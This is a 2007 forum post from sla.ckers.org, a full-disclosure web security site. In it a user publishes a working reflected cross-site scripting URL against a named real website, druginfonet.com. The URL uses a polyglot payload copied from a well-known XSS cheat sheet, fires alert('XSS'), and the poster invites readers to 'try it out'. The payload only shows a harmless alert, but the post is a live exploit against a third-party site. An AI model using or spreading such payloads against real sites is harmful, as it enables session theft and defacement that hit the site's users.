Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
druginfonet.com xss via url
Posted by: Spyware
Date: February 11, 2007 03:56PM

//XSS//
http://www.druginfonet.com/index.php?pageID=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
//ENDXSS//

wrong url gets parsed CRAZY on the site. try it out. (1 alert, VERY many parses).

I was lazy so I just used the cheatsheet. theres probably better way of doing this, go figure.

Im off to bed, have fun.

Options: ReplyQuote


Sorry, only registered users may post in this forum.